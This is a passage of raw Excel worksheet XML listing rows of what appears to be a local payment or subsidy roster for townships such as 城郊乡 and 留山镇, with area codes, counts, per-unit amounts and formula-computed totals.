      <c r="A1161" s="23" t="s">
        <v>3107</v>
      </c>
      <c r="B1161" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1161" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1161" s="24" t="s">
        <v>3109</v>
      </c>
      <c r="E1161" s="24" t="s">
        <v>3110</v>
      </c>
      <c r="F1161" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1161" s="24">
        <v>1</v>
      </c>
      <c r="H1161" s="25">
        <v>365</v>
      </c>
      <c r="I1161" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1161" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1161" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1162" customHeight="1" spans="1:14">
      <c r="A1162" s="23" t="s">
        <v>3112</v>
      </c>
      <c r="B1162" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1162" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1162" s="24" t="s">
        <v>3113</v>
      </c>
      <c r="E1162" s="24" t="s">
        <v>3114</v>
      </c>
      <c r="F1162" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1162" s="24">
        <v>1</v>
      </c>
      <c r="H1162" s="25">
        <v>365</v>
      </c>
      <c r="I1162" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1162" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1162" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1163" customHeight="1" spans="1:14">
      <c r="A1163" s="23" t="s">
        <v>3115</v>
      </c>
      <c r="B1163" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1163" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1163" s="24" t="s">
        <v>3116</v>
      </c>
      <c r="E1163" s="24" t="s">
        <v>3117</v>
      </c>
      <c r="F1163" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1163" s="24">
        <v>2</v>
      </c>
      <c r="H1163" s="25">
        <v>325</v>
      </c>
      <c r="I1163" s="24">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J1163" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1163" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1164" customHeight="1" spans="1:14">
      <c r="A1164" s="23" t="s">
        <v>3118</v>
      </c>
      <c r="B1164" s="24" t="str">
        <f>B1163</f>
        <v>城郊乡</v>
      </c>
      <c r="C1164" s="24" t="str">
        <f>C1163</f>
        <v>城郊乡</v>
      </c>
      <c r="D1164" s="23" t="s">
        <v>3119</v>
      </c>
      <c r="E1164" s="32" t="s">
        <v>3120</v>
      </c>
      <c r="F1164" s="24" t="str">
        <f>F1163</f>
        <v>4113210299</v>
      </c>
      <c r="G1164" s="24"/>
      <c r="H1164" s="24"/>
      <c r="I1164" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1164" s="24"/>
      <c r="K1164" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1165" customHeight="1" spans="1:14">
      <c r="A1165" s="23" t="s">
        <v>3121</v>
      </c>
      <c r="B1165" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1165" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1165" s="24" t="s">
        <v>3122</v>
      </c>
      <c r="E1165" s="24" t="s">
        <v>3123</v>
      </c>
      <c r="F1165" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1165" s="24">
        <v>1</v>
      </c>
      <c r="H1165" s="25">
        <v>365</v>
      </c>
      <c r="I1165" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1165" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1165" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1166" customHeight="1" spans="1:14">
      <c r="A1166" s="23" t="s">
        <v>3124</v>
      </c>
      <c r="B1166" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1166" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1166" s="24" t="s">
        <v>3125</v>
      </c>
      <c r="E1166" s="24" t="s">
        <v>3126</v>
      </c>
      <c r="F1166" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1166" s="24">
        <v>1</v>
      </c>
      <c r="H1166" s="25">
        <v>365</v>
      </c>
      <c r="I1166" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1166" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1166" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1167" customHeight="1" spans="1:14">
      <c r="A1167" s="23" t="s">
        <v>3127</v>
      </c>
      <c r="B1167" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1167" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1167" s="24" t="s">
        <v>3128</v>
      </c>
      <c r="E1167" s="24" t="s">
        <v>611</v>
      </c>
      <c r="F1167" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1167" s="24">
        <v>1</v>
      </c>
      <c r="H1167" s="25">
        <v>365</v>
      </c>
      <c r="I1167" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1167" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1167" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1168" customHeight="1" spans="1:14">
      <c r="A1168" s="23" t="s">
        <v>3129</v>
      </c>
      <c r="B1168" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1168" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1168" s="24" t="s">
        <v>3130</v>
      </c>
      <c r="E1168" s="24" t="s">
        <v>3131</v>
      </c>
      <c r="F1168" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1168" s="24">
        <v>1</v>
      </c>
      <c r="H1168" s="25">
        <v>365</v>
      </c>
      <c r="I1168" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1168" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1168" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1169" customHeight="1" spans="1:11">
      <c r="A1169" s="23" t="s">
        <v>3132</v>
      </c>
      <c r="B1169" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1169" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1169" s="24" t="s">
        <v>3133</v>
      </c>
      <c r="E1169" s="24" t="s">
        <v>3134</v>
      </c>
      <c r="F1169" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1169" s="24">
        <v>2</v>
      </c>
      <c r="H1169" s="25">
        <v>325</v>
      </c>
      <c r="I1169" s="24">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J1169" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1169" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1170" customHeight="1" spans="1:11">
      <c r="A1170" s="23" t="s">
        <v>3135</v>
      </c>
      <c r="B1170" s="24" t="str">
        <f>B1169</f>
        <v>城郊乡</v>
      </c>
      <c r="C1170" s="24" t="str">
        <f>C1169</f>
        <v>城郊乡</v>
      </c>
      <c r="D1170" s="23" t="s">
        <v>3136</v>
      </c>
      <c r="E1170" s="23" t="s">
        <v>416</v>
      </c>
      <c r="F1170" s="24" t="str">
        <f>F1169</f>
        <v>4113210299</v>
      </c>
      <c r="G1170" s="24"/>
      <c r="H1170" s="24"/>
      <c r="I1170" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1170" s="24"/>
      <c r="K1170" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1171" customHeight="1" spans="1:11">
      <c r="A1171" s="23" t="s">
        <v>3137</v>
      </c>
      <c r="B1171" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1171" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1171" s="24" t="s">
        <v>3138</v>
      </c>
      <c r="E1171" s="24" t="s">
        <v>3139</v>
      </c>
      <c r="F1171" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1171" s="24">
        <v>1</v>
      </c>
      <c r="H1171" s="25">
        <v>365</v>
      </c>
      <c r="I1171" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1171" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1171" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1172" customHeight="1" spans="1:11">
      <c r="A1172" s="23" t="s">
        <v>3140</v>
      </c>
      <c r="B1172" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1172" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1172" s="24" t="s">
        <v>3141</v>
      </c>
      <c r="E1172" s="24" t="s">
        <v>479</v>
      </c>
      <c r="F1172" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1172" s="24">
        <v>1</v>
      </c>
      <c r="H1172" s="25">
        <v>365</v>
      </c>
      <c r="I1172" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1172" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1172" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1173" customHeight="1" spans="1:11">
      <c r="A1173" s="23" t="s">
        <v>3142</v>
      </c>
      <c r="B1173" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1173" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1173" s="24" t="s">
        <v>3143</v>
      </c>
      <c r="E1173" s="24" t="s">
        <v>3144</v>
      </c>
      <c r="F1173" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1173" s="24">
        <v>1</v>
      </c>
      <c r="H1173" s="25">
        <v>365</v>
      </c>
      <c r="I1173" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1173" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1173" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1174" customHeight="1" spans="1:11">
      <c r="A1174" s="23" t="s">
        <v>3145</v>
      </c>
      <c r="B1174" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1174" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1174" s="24" t="s">
        <v>3146</v>
      </c>
      <c r="E1174" s="24" t="s">
        <v>2725</v>
      </c>
      <c r="F1174" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1174" s="24">
        <v>1</v>
      </c>
      <c r="H1174" s="25">
        <v>365</v>
      </c>
      <c r="I1174" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1174" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1174" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1175" customHeight="1" spans="1:11">
      <c r="A1175" s="23" t="s">
        <v>3147</v>
      </c>
      <c r="B1175" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1175" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1175" s="24" t="s">
        <v>3148</v>
      </c>
      <c r="E1175" s="24" t="s">
        <v>3149</v>
      </c>
      <c r="F1175" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1175" s="24">
        <v>2</v>
      </c>
      <c r="H1175" s="25">
        <v>325</v>
      </c>
      <c r="I1175" s="24">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J1175" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1175" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1176" customHeight="1" spans="1:11">
      <c r="A1176" s="23" t="s">
        <v>3150</v>
      </c>
      <c r="B1176" s="24" t="str">
        <f>B1175</f>
        <v>城郊乡</v>
      </c>
      <c r="C1176" s="24" t="str">
        <f>C1175</f>
        <v>城郊乡</v>
      </c>
      <c r="D1176" s="23" t="s">
        <v>3151</v>
      </c>
      <c r="E1176" s="32" t="s">
        <v>3152</v>
      </c>
      <c r="F1176" s="24" t="str">
        <f>F1175</f>
        <v>4113210299</v>
      </c>
      <c r="G1176" s="24"/>
      <c r="H1176" s="24"/>
      <c r="I1176" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1176" s="24"/>
      <c r="K1176" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1177" customHeight="1" spans="1:11">
      <c r="A1177" s="23" t="s">
        <v>3153</v>
      </c>
      <c r="B1177" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1177" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1177" s="24" t="s">
        <v>3154</v>
      </c>
      <c r="E1177" s="24" t="s">
        <v>360</v>
      </c>
      <c r="F1177" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1177" s="24">
        <v>1</v>
      </c>
      <c r="H1177" s="25">
        <v>365</v>
      </c>
      <c r="I1177" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1177" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1177" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1178" customHeight="1" spans="1:11">
      <c r="A1178" s="23" t="s">
        <v>3155</v>
      </c>
      <c r="B1178" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1178" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1178" s="24" t="s">
        <v>3156</v>
      </c>
      <c r="E1178" s="24" t="s">
        <v>3157</v>
      </c>
      <c r="F1178" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1178" s="24">
        <v>1</v>
      </c>
      <c r="H1178" s="25">
        <v>365</v>
      </c>
      <c r="I1178" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1178" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1178" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1179" customHeight="1" spans="1:11">
      <c r="A1179" s="23" t="s">
        <v>3158</v>
      </c>
      <c r="B1179" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1179" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="D1179" s="24" t="s">
        <v>3159</v>
      </c>
      <c r="E1179" s="24" t="s">
        <v>3066</v>
      </c>
      <c r="F1179" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1179" s="24">
        <v>2</v>
      </c>
      <c r="H1179" s="25">
        <v>325</v>
      </c>
      <c r="I1179" s="24">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J1179" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1179" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1180" customHeight="1" spans="1:11">
      <c r="A1180" s="23" t="s">
        <v>3160</v>
      </c>
      <c r="B1180" s="24" t="str">
        <f>B1179</f>
        <v>城郊乡</v>
      </c>
      <c r="C1180" s="24" t="str">
        <f>C1179</f>
        <v>城郊乡</v>
      </c>
      <c r="D1180" s="23" t="s">
        <v>3161</v>
      </c>
      <c r="E1180" s="23" t="s">
        <v>3162</v>
      </c>
      <c r="F1180" s="24" t="str">
        <f>F1179</f>
        <v>4113210299</v>
      </c>
      <c r="G1180" s="24"/>
      <c r="H1180" s="24"/>
      <c r="I1180" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1180" s="24"/>
      <c r="K1180" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1181" customHeight="1" spans="1:11">
      <c r="A1181" s="23" t="s">
        <v>3163</v>
      </c>
      <c r="B1181" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1181" s="24" t="s">
        <v>3164</v>
      </c>
      <c r="D1181" s="24" t="s">
        <v>3165</v>
      </c>
      <c r="E1181" s="24" t="s">
        <v>3166</v>
      </c>
      <c r="F1181" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1181" s="24">
        <v>1</v>
      </c>
      <c r="H1181" s="25">
        <v>365</v>
      </c>
      <c r="I1181" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1181" s="41">
        <v>45108</v>
      </c>
      <c r="K1181" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1182" customHeight="1" spans="1:11">
      <c r="A1182" s="23" t="s">
        <v>3167</v>
      </c>
      <c r="B1182" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1182" s="24" t="s">
        <v>3164</v>
      </c>
      <c r="D1182" s="24" t="s">
        <v>3168</v>
      </c>
      <c r="E1182" s="24" t="s">
        <v>3169</v>
      </c>
      <c r="F1182" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1182" s="24">
        <v>1</v>
      </c>
      <c r="H1182" s="25">
        <v>365</v>
      </c>
      <c r="I1182" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1182" s="41">
        <v>45108</v>
      </c>
      <c r="K1182" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1183" customHeight="1" spans="1:11">
      <c r="A1183" s="23" t="s">
        <v>3170</v>
      </c>
      <c r="B1183" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1183" s="24" t="s">
        <v>3171</v>
      </c>
      <c r="D1183" s="24" t="s">
        <v>3172</v>
      </c>
      <c r="E1183" s="24" t="s">
        <v>1459</v>
      </c>
      <c r="F1183" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1183" s="24">
        <v>1</v>
      </c>
      <c r="H1183" s="25">
        <v>365</v>
      </c>
      <c r="I1183" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1183" s="24">
        <v>45231</v>
      </c>
      <c r="K1183" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1184" customHeight="1" spans="1:11">
      <c r="A1184" s="23" t="s">
        <v>3173</v>
      </c>
      <c r="B1184" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1184" s="24" t="s">
        <v>3164</v>
      </c>
      <c r="D1184" s="24" t="s">
        <v>3174</v>
      </c>
      <c r="E1184" s="24" t="s">
        <v>3175</v>
      </c>
      <c r="F1184" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1184" s="24">
        <v>3</v>
      </c>
      <c r="H1184" s="25">
        <v>320</v>
      </c>
      <c r="I1184" s="24">
        <f t="shared" si="18"/>
        <v>960</v>
      </c>
      <c r="J1184" s="41">
        <v>45108</v>
      </c>
      <c r="K1184" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1185" customHeight="1" spans="1:11">
      <c r="A1185" s="23" t="s">
        <v>3176</v>
      </c>
      <c r="B1185" s="24" t="str">
        <f>B1184</f>
        <v>城郊乡</v>
      </c>
      <c r="C1185" s="24" t="str">
        <f>C1184</f>
        <v>城郊校委会</v>
      </c>
      <c r="D1185" s="23" t="s">
        <v>3177</v>
      </c>
      <c r="E1185" s="24" t="s">
        <v>3178</v>
      </c>
      <c r="F1185" s="24" t="str">
        <f>F1184</f>
        <v>4113210299</v>
      </c>
      <c r="G1185" s="24"/>
      <c r="H1185" s="24"/>
      <c r="I1185" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1185" s="24"/>
      <c r="K1185" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1186" customHeight="1" spans="1:11">
      <c r="A1186" s="23" t="s">
        <v>3179</v>
      </c>
      <c r="B1186" s="24" t="str">
        <f>B1185</f>
        <v>城郊乡</v>
      </c>
      <c r="C1186" s="24" t="str">
        <f>C1185</f>
        <v>城郊校委会</v>
      </c>
      <c r="D1186" s="23" t="s">
        <v>3180</v>
      </c>
      <c r="E1186" s="30" t="s">
        <v>3181</v>
      </c>
      <c r="F1186" s="24" t="str">
        <f>F1185</f>
        <v>4113210299</v>
      </c>
      <c r="G1186" s="24"/>
      <c r="H1186" s="24"/>
      <c r="I1186" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1186" s="24"/>
      <c r="K1186" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1187" customHeight="1" spans="1:11">
      <c r="A1187" s="23" t="s">
        <v>3182</v>
      </c>
      <c r="B1187" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1187" s="24" t="s">
        <v>3183</v>
      </c>
      <c r="D1187" s="24" t="s">
        <v>3184</v>
      </c>
      <c r="E1187" s="24" t="s">
        <v>3185</v>
      </c>
      <c r="F1187" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1187" s="24">
        <v>1</v>
      </c>
      <c r="H1187" s="25">
        <v>365</v>
      </c>
      <c r="I1187" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1187" s="24">
        <v>45261</v>
      </c>
      <c r="K1187" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1188" customHeight="1" spans="1:11">
      <c r="A1188" s="23" t="s">
        <v>3186</v>
      </c>
      <c r="B1188" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1188" s="24" t="s">
        <v>3187</v>
      </c>
      <c r="D1188" s="24" t="s">
        <v>1823</v>
      </c>
      <c r="E1188" s="24" t="s">
        <v>3117</v>
      </c>
      <c r="F1188" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1188" s="24">
        <v>1</v>
      </c>
      <c r="H1188" s="25">
        <v>365</v>
      </c>
      <c r="I1188" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1188" s="41">
        <v>45108</v>
      </c>
      <c r="K1188" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1189" customHeight="1" spans="1:11">
      <c r="A1189" s="23" t="s">
        <v>3188</v>
      </c>
      <c r="B1189" s="24" t="s">
        <v>3108</v>
      </c>
      <c r="C1189" s="24" t="s">
        <v>3187</v>
      </c>
      <c r="D1189" s="24" t="s">
        <v>3189</v>
      </c>
      <c r="E1189" s="24" t="s">
        <v>3190</v>
      </c>
      <c r="F1189" s="24" t="s">
        <v>3111</v>
      </c>
      <c r="G1189" s="24">
        <v>1</v>
      </c>
      <c r="H1189" s="25">
        <v>365</v>
      </c>
      <c r="I1189" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1189" s="41">
        <v>45108</v>
      </c>
      <c r="K1189" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1190" customHeight="1" spans="1:11">
      <c r="A1190" s="23" t="s">
        <v>3191</v>
      </c>
      <c r="B1190" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1190" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1190" s="24" t="s">
        <v>3193</v>
      </c>
      <c r="E1190" s="24" t="s">
        <v>3194</v>
      </c>
      <c r="F1190" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1190" s="24">
        <v>2</v>
      </c>
      <c r="H1190" s="25">
        <v>325</v>
      </c>
      <c r="I1190" s="24">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J1190" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1190" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1191" customHeight="1" spans="1:11">
      <c r="A1191" s="23" t="s">
        <v>3195</v>
      </c>
      <c r="B1191" s="24" t="str">
        <f>B1190</f>
        <v>留山镇</v>
      </c>
      <c r="C1191" s="24" t="str">
        <f>C1190</f>
        <v>留山镇</v>
      </c>
      <c r="D1191" s="23" t="s">
        <v>3196</v>
      </c>
      <c r="E1191" s="23" t="s">
        <v>3197</v>
      </c>
      <c r="F1191" s="24">
        <f>F1190</f>
        <v>4113210399</v>
      </c>
      <c r="G1191" s="24"/>
      <c r="H1191" s="24"/>
      <c r="I1191" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1191" s="24"/>
      <c r="K1191" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1192" customHeight="1" spans="1:11">
      <c r="A1192" s="23" t="s">
        <v>3198</v>
      </c>
      <c r="B1192" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1192" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1192" s="24" t="s">
        <v>3199</v>
      </c>
      <c r="E1192" s="24" t="s">
        <v>3200</v>
      </c>
      <c r="F1192" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1192" s="24">
        <v>1</v>
      </c>
      <c r="H1192" s="25">
        <v>365</v>
      </c>
      <c r="I1192" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1192" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1192" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1193" customHeight="1" spans="1:11">
      <c r="A1193" s="23" t="s">
        <v>3201</v>
      </c>
      <c r="B1193" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1193" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1193" s="24" t="s">
        <v>3202</v>
      </c>
      <c r="E1193" s="24" t="s">
        <v>3203</v>
      </c>
      <c r="F1193" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1193" s="24">
        <v>2</v>
      </c>
      <c r="H1193" s="25">
        <v>325</v>
      </c>
      <c r="I1193" s="24">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J1193" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1193" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1194" customHeight="1" spans="1:11">
      <c r="A1194" s="23" t="s">
        <v>3204</v>
      </c>
      <c r="B1194" s="24" t="str">
        <f>B1193</f>
        <v>留山镇</v>
      </c>
      <c r="C1194" s="24" t="str">
        <f>C1193</f>
        <v>留山镇</v>
      </c>
      <c r="D1194" s="23" t="s">
        <v>3205</v>
      </c>
      <c r="E1194" s="23" t="s">
        <v>3206</v>
      </c>
      <c r="F1194" s="24">
        <f>F1193</f>
        <v>4113210399</v>
      </c>
      <c r="G1194" s="24"/>
      <c r="H1194" s="24"/>
      <c r="I1194" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1194" s="24"/>
      <c r="K1194" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1195" customHeight="1" spans="1:11">
      <c r="A1195" s="23" t="s">
        <v>3207</v>
      </c>
      <c r="B1195" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1195" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1195" s="24" t="s">
        <v>3208</v>
      </c>
      <c r="E1195" s="24" t="s">
        <v>3209</v>
      </c>
      <c r="F1195" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1195" s="24">
        <v>1</v>
      </c>
      <c r="H1195" s="25">
        <v>365</v>
      </c>
      <c r="I1195" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1195" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1195" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1196" customHeight="1" spans="1:11">
      <c r="A1196" s="23" t="s">
        <v>3210</v>
      </c>
      <c r="B1196" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1196" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1196" s="24" t="s">
        <v>3211</v>
      </c>
      <c r="E1196" s="24" t="s">
        <v>3212</v>
      </c>
      <c r="F1196" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1196" s="24">
        <v>2</v>
      </c>
      <c r="H1196" s="25">
        <v>325</v>
      </c>
      <c r="I1196" s="24">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J1196" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1196" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1197" customHeight="1" spans="1:11">
      <c r="A1197" s="23" t="s">
        <v>3213</v>
      </c>
      <c r="B1197" s="24" t="str">
        <f>B1196</f>
        <v>留山镇</v>
      </c>
      <c r="C1197" s="24" t="str">
        <f>C1196</f>
        <v>留山镇</v>
      </c>
      <c r="D1197" s="23" t="s">
        <v>3214</v>
      </c>
      <c r="E1197" s="23" t="s">
        <v>3215</v>
      </c>
      <c r="F1197" s="24">
        <f>F1196</f>
        <v>4113210399</v>
      </c>
      <c r="G1197" s="24"/>
      <c r="H1197" s="24"/>
      <c r="I1197" s="24">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="J1197" s="24"/>
      <c r="K1197" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1198" customHeight="1" spans="1:11">
      <c r="A1198" s="23" t="s">
        <v>3216</v>
      </c>
      <c r="B1198" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1198" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1198" s="24" t="s">
        <v>3217</v>
      </c>
      <c r="E1198" s="24" t="s">
        <v>3206</v>
      </c>
      <c r="F1198" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1198" s="24">
        <v>1</v>
      </c>
      <c r="H1198" s="25">
        <v>365</v>
      </c>
      <c r="I1198" s="24">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J1198" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1198" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1199" customHeight="1" spans="1:11">
      <c r="A1199" s="23" t="s">
        <v>3218</v>
      </c>
      <c r="B1199" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1199" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1199" s="24" t="s">
        <v>3219</v>
      </c>
      <c r="E1199" s="24" t="s">
        <v>3220</v>
      </c>
      <c r="F1199" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1199" s="24">
        <v>1</v>
      </c>
      <c r="H1199" s="25">
        <v>365</v>
      </c>
